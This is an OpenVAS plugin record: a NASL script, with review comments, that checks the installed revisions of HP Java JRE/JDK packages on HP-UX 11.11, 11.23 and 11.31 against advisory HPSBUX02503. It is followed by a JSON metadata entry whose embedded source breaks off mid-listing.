ID OPENVAS:1361412562310835225 Type openvas Reporter Copyright (c) 2010 Greenbone Networks GmbH Modified 2018-01-23T00:00:00
Description
Check for the Version of Java
###############################################################################
# OpenVAS Vulnerability Test
#
# HP-UX Update for Java HPSBUX02503
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
# Advisory text that the registration block below attaches to the plugin as
# its "impact", "affected", "insight" and "solution" tags. Each string spans
# several source lines, so re-wrapping a literal changes the reported text.
tag_impact = "Remote Increase in privilege
Denial of Service and other vulnerabilities";
# The "or earlier" versions listed here sit one step below the revisions the
# package checks further down pass to ishpuxpkgvuln() (1.4.2.24.00,
# 1.5.0.19.00, 1.6.0.06.00); keep the two in sync when the advisory changes.
tag_affected = "Java on
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or
earlier";
tag_insight = "Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, privilege
escalation, and Denial of Service (DoS)";
# NOTE(review): the solution text names no target revision; the vendor
# bulletin is only reachable through the script_xref URL in the
# registration block.
tag_solution = "Please Install the Updated Packages.";
if (description)
{
  # When `description` is set, the script only registers its metadata and
  # stops at the exit(0) below; none of the package checks run.

  # Vendor bulletin and plugin identity.
  script_xref(name:"URL", value:"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760");
  script_oid("1.3.6.1.4.1.25623.1.0.835225");
  script_version("$Revision: 8495 $");
  script_tag(name:"last_modification", value:"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $");
  script_tag(name:"creation_date", value:"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)");

  # Severity (CVSS v2 base score and vector) and the advisory/CVE references.
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_xref(name:"HPSBUX", value:"02503");
  script_cve_id("CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877");
  script_name("HP-UX Update for Java HPSBUX02503");

  # NOTE(review): the summary does not name the advisory or say that the
  # result comes from comparing installed package revisions.
  script_tag(name:"summary", value:"Check for the Version of Java");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
  script_family("HP-UX Local Security Checks");

  # The check depends on gather-package-list.nasl and on the two ssh/login
  # KB keys being present, so it presumably needs an authenticated scan that
  # has already collected the host's package list -- confirm against
  # gather-package-list.nasl.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/hp_hp-ux", "ssh/login/release");

  # Advisory text defined in the tag_* variables above this block.
  script_tag(name:"impact", value:tag_impact);
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);

  # qod_type "package": the finding rests on package revision data.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}
include("pkg-lib-hpux.inc");
# Holds the result of each ishpuxpkgvuln() call in the release blocks below.
res = "";

# HP-UX release string read from the KB item ssh/login/release.
release = get_kb_item("ssh/login/release");
if (release == NULL)
{
  # No release recorded: stop without reporting anything. This is exit(0),
  # not the exit(99) the release blocks annotate as "Not vulnerable", so a
  # host that ends here has not been checked rather than found clean.
  exit(0);
}
if (release == "HPUX11.31")
{
  # Each package is passed to ishpuxpkgvuln() with the revision for its Java
  # line; a non-NULL result is reported and ends the script.
  # NOTE(review): because the first hit exits, the report names one package
  # only; other Java packages on the same host may be outdated as well.
  # The revisions are one step above the "or earlier" versions in
  # tag_affected, so they look like the first fixed revisions -- presumably
  # the helper flags anything older; confirm in pkg-lib-hpux.inc.

  # Java 1.4.2: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre14.JRE14-COM",
                              "Jre14.JRE14-PA11",
                              "Jre14.JRE14-PA11-HS",
                              "Jre14.JRE14-PA20",
                              "Jre14.JRE14-PA20-HS",
                              "Jre14.JRE14-PA20W",
                              "Jre14.JRE14-PA20W-HS",
                              "Jre14.JRE14-IPF32",
                              "Jre14.JRE14-IPF32-HS",
                              "Jre14.JRE14-IPF64",
                              "Jre14.JRE14-IPF64-HS",
                              "Jdk14.JDK14-COM",
                              "Jdk14.JDK14-IPF32",
                              "Jdk14.JDK14-IPF64",
                              "Jdk14.JDK14-PA11",
                              "Jdk14.JDK14-PA20",
                              "Jdk14.JDK14-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.4.2.24.00", rls:"HPUX11.31");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.5.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre15.JRE15-COM",
                              "Jre15.JRE15-PA20",
                              "Jre15.JRE15-PA20-HS",
                              "Jre15.JRE15-PA20W",
                              "Jre15.JRE15-PA20W-HS",
                              "Jre15.JRE15-IPF32",
                              "Jre15.JRE15-IPF32-HS",
                              "Jre15.JRE15-IPF64",
                              "Jre15.JRE15-IPF64-HS",
                              "Jdk15.JDK15-PA20",
                              "Jdk15.JDK15-PA20W",
                              "Jdk15.JDK15-COM",
                              "Jdk15.JDK15-IPF32",
                              "Jdk15.JDK15-IPF64"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.5.0.19.00", rls:"HPUX11.31");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.6.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre60.JRE60-COM",
                              "Jre60.JRE60-IPF32",
                              "Jre60.JRE60-IPF32-HS",
                              "Jre60.JRE60-IPF64",
                              "Jre60.JRE60-IPF64-HS",
                              "Jre60.JRE60-PA20",
                              "Jre60.JRE60-PA20-HS",
                              "Jre60.JRE60-PA20W",
                              "Jre60.JRE60-PA20W-HS",
                              "Jdk60.JDK60-COM",
                              "Jdk60.JDK60-IPF32",
                              "Jdk60.JDK60-IPF64",
                              "Jdk60.JDK60-PA20",
                              "Jdk60.JDK60-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.6.0.06.00", rls:"HPUX11.31");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # __pkg_match is not defined in this file -- presumably set by
  # pkg-lib-hpux.inc when a listed package was found installed; confirm.
  if (__pkg_match)
  {
    exit(99); # Not vulnerable.
  }

  # Nothing matched: end without a result.
  exit(0);
}
if (release == "HPUX11.23")
{
  # Each package is passed to ishpuxpkgvuln() with the revision for its Java
  # line; a non-NULL result is reported and ends the script.
  # NOTE(review): because the first hit exits, the report names one package
  # only; other Java packages on the same host may be outdated as well.
  # The revisions are one step above the "or earlier" versions in
  # tag_affected, so they look like the first fixed revisions -- presumably
  # the helper flags anything older; confirm in pkg-lib-hpux.inc.

  # Java 1.4.2: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre14.JRE14-COM",
                              "Jre14.JRE14-PA11",
                              "Jre14.JRE14-PA11-HS",
                              "Jre14.JRE14-PA20",
                              "Jre14.JRE14-PA20-HS",
                              "Jre14.JRE14-PA20W",
                              "Jre14.JRE14-PA20W-HS",
                              "Jre14.JRE14-IPF32",
                              "Jre14.JRE14-IPF32-HS",
                              "Jre14.JRE14-IPF64",
                              "Jre14.JRE14-IPF64-HS",
                              "Jdk14.JDK14-COM",
                              "Jdk14.JDK14-IPF32",
                              "Jdk14.JDK14-IPF64",
                              "Jdk14.JDK14-PA11",
                              "Jdk14.JDK14-PA20",
                              "Jdk14.JDK14-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.4.2.24.00", rls:"HPUX11.23");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.5.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre15.JRE15-COM",
                              "Jre15.JRE15-PA20",
                              "Jre15.JRE15-PA20-HS",
                              "Jre15.JRE15-PA20W",
                              "Jre15.JRE15-PA20W-HS",
                              "Jre15.JRE15-IPF32",
                              "Jre15.JRE15-IPF32-HS",
                              "Jre15.JRE15-IPF64",
                              "Jre15.JRE15-IPF64-HS",
                              "Jdk15.JDK15-PA20",
                              "Jdk15.JDK15-PA20W",
                              "Jdk15.JDK15-COM",
                              "Jdk15.JDK15-IPF32",
                              "Jdk15.JDK15-IPF64"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.5.0.19.00", rls:"HPUX11.23");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.6.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre60.JRE60-COM",
                              "Jre60.JRE60-IPF32",
                              "Jre60.JRE60-IPF32-HS",
                              "Jre60.JRE60-IPF64",
                              "Jre60.JRE60-IPF64-HS",
                              "Jre60.JRE60-PA20",
                              "Jre60.JRE60-PA20-HS",
                              "Jre60.JRE60-PA20W",
                              "Jre60.JRE60-PA20W-HS",
                              "Jdk60.JDK60-COM",
                              "Jdk60.JDK60-IPF32",
                              "Jdk60.JDK60-IPF64",
                              "Jdk60.JDK60-PA20",
                              "Jdk60.JDK60-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.6.0.06.00", rls:"HPUX11.23");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # __pkg_match is not defined in this file -- presumably set by
  # pkg-lib-hpux.inc when a listed package was found installed; confirm.
  if (__pkg_match)
  {
    exit(99); # Not vulnerable.
  }

  # Nothing matched: end without a result.
  exit(0);
}
if (release == "HPUX11.11")
{
  # Each package is passed to ishpuxpkgvuln() with the revision for its Java
  # line; a non-NULL result is reported and ends the script.
  # NOTE(review): because the first hit exits, the report names one package
  # only; other Java packages on the same host may be outdated as well.
  # The revisions are one step above the "or earlier" versions in
  # tag_affected, so they look like the first fixed revisions -- presumably
  # the helper flags anything older; confirm in pkg-lib-hpux.inc.

  # Java 1.4.2: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre14.JRE14-COM",
                              "Jre14.JRE14-PA11",
                              "Jre14.JRE14-PA11-HS",
                              "Jre14.JRE14-PA20",
                              "Jre14.JRE14-PA20-HS",
                              "Jre14.JRE14-PA20W",
                              "Jre14.JRE14-PA20W-HS",
                              "Jre14.JRE14-IPF32",
                              "Jre14.JRE14-IPF32-HS",
                              "Jre14.JRE14-IPF64",
                              "Jre14.JRE14-IPF64-HS",
                              "Jdk14.JDK14-COM",
                              "Jdk14.JDK14-IPF32",
                              "Jdk14.JDK14-IPF64",
                              "Jdk14.JDK14-PA11",
                              "Jdk14.JDK14-PA20",
                              "Jdk14.JDK14-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.4.2.24.00", rls:"HPUX11.11");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.5.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre15.JRE15-COM",
                              "Jre15.JRE15-PA20",
                              "Jre15.JRE15-PA20-HS",
                              "Jre15.JRE15-PA20W",
                              "Jre15.JRE15-PA20W-HS",
                              "Jre15.JRE15-IPF32",
                              "Jre15.JRE15-IPF32-HS",
                              "Jre15.JRE15-IPF64",
                              "Jre15.JRE15-IPF64-HS",
                              "Jdk15.JDK15-PA20",
                              "Jdk15.JDK15-PA20W",
                              "Jdk15.JDK15-COM",
                              "Jdk15.JDK15-IPF32",
                              "Jdk15.JDK15-IPF64"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.5.0.19.00", rls:"HPUX11.11");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Java 1.6.0: JRE packages, then JDK packages.
  foreach java_pkg (make_list("Jre60.JRE60-COM",
                              "Jre60.JRE60-IPF32",
                              "Jre60.JRE60-IPF32-HS",
                              "Jre60.JRE60-IPF64",
                              "Jre60.JRE60-IPF64-HS",
                              "Jre60.JRE60-PA20",
                              "Jre60.JRE60-PA20-HS",
                              "Jre60.JRE60-PA20W",
                              "Jre60.JRE60-PA20W-HS",
                              "Jdk60.JDK60-COM",
                              "Jdk60.JDK60-IPF32",
                              "Jdk60.JDK60-IPF64",
                              "Jdk60.JDK60-PA20",
                              "Jdk60.JDK60-PA20W"))
  {
    res = ishpuxpkgvuln(pkg:java_pkg, revision:"1.6.0.06.00", rls:"HPUX11.11");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # __pkg_match is not defined in this file -- presumably set by
  # pkg-lib-hpux.inc when a listed package was found installed; confirm.
  if (__pkg_match)
  {
    exit(99); # Not vulnerable.
  }

  # Nothing matched: end without a result.
  exit(0);
}
{"id": "OPENVAS:1361412562310835225", "type": "openvas", "bulletinFamily": "scanner", "title": "HP-UX Update for Java HPSBUX02503", "description": "Check for the Version of Java", "published": "2010-02-15T00:00:00", "modified": "2018-01-23T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835225", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["02503", "http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760"], "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "lastseen": "2018-01-23T13:05:36", "viewCount": 1, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2018-01-23T13:05:36", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10369", "SECURITYVULNS:VULN:11915", "SECURITYVULNS:DOC:27037"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066469", "OPENVAS:800975", "OPENVAS:66471", "OPENVAS:1361412562310800972", "OPENVAS:800972", "OPENVAS:136141256231066303", "OPENVAS:136141256231066471", "OPENVAS:66469", "OPENVAS:835225", "OPENVAS:1361412562310800975"]}, {"type": "redhat", "idList": ["RHSA-2009:1647", "RHSA-2009:1551", "RHSA-2009:1571", "RHSA-2009:1584", "RHSA-2009:1694", "RHSA-2010:0408", "RHSA-2009:1643", "RHSA-2009:1560"]}, {"type": "suse", "idList": ["SUSE-SA:2010:004", "SUSE-SA:2010:002", "SUSE-SA:2010:003", "SUSE-SA:2009:058"]}, {"type": "nessus", "idList": ["SUSE_JAVA-1_5_0-IBM-6741.NASL", "SUSE_11_JAVA-1_6_0-SUN-091113.NASL", "SUSE_11_0_JAVA-1_5_0-SUN-091109.NASL", "SUSE_11_1_JAVA-1_5_0-SUN-091109.NASL", "SUSE9_12564.NASL", "REDHAT-RHSA-2009-1647.NASL", "SUSE_11_0_JAVA-1_6_0-SUN-091113.NASL", "SUSE_11_2_JAVA-1_6_0-SUN-091113.NASL", "REDHAT-RHSA-2009-1643.NASL", 
"SUSE_JAVA-1_5_0-IBM-6740.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84499"]}, {"type": "cve", "idList": ["CVE-2009-3877", "CVE-2009-3874", "CVE-2009-3867", "CVE-2009-3876", "CVE-2009-3869", "CVE-2009-3875", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3868", "CVE-2009-3873"]}, {"type": "kaspersky", "idList": ["KLA10344"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1584"]}, {"type": "centos", "idList": ["CESA-2009:1584"]}, {"type": "fedora", "idList": ["FEDORA:9A32710F7FF", "FEDORA:BD01E10F83E", "FEDORA:1C6D410F83E"]}, {"type": "ubuntu", "idList": ["USN-859-1"]}], "modified": "2018-01-23T13:05:36", "rev": 2}, "vulnersScore": 8.7}, "pluginID": "1361412562310835225", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835225\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: 
\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", 
rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", 
